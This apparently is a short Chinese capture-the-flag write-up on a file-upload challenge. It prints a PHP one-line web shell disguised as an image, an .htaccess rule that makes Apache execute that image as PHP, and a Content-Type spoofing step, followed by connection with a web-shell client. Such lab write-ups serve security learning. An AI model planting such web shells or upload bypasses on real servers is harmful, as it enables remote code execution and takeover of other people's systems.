进入靶场,看到上传页面
试着上传一句话木马试试
<?php @eval($_POST['cmd']);?>,将文件改为图片格式,jpg或者png
提示我们上传成功,发现使用蚁剑连不上,看了其他大佬的wp发现是文件解析漏洞
.htaccess文件解析漏洞
总结下来的经验就是更改Apache里的.htaccess的配置。可以将其它类型的文件转化为PHP的文件类型。
我们需要写个.htaccess使用php解析器对图片进行解析
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
上传.htaccess文件,这里需要注意
Contenr-Type这里需要修改为image/png
这里看到.htaccess文件上传成功,在使用蚁剑进行连接
拿到flag
知识点:
文件解析漏洞
.htaccess文件使用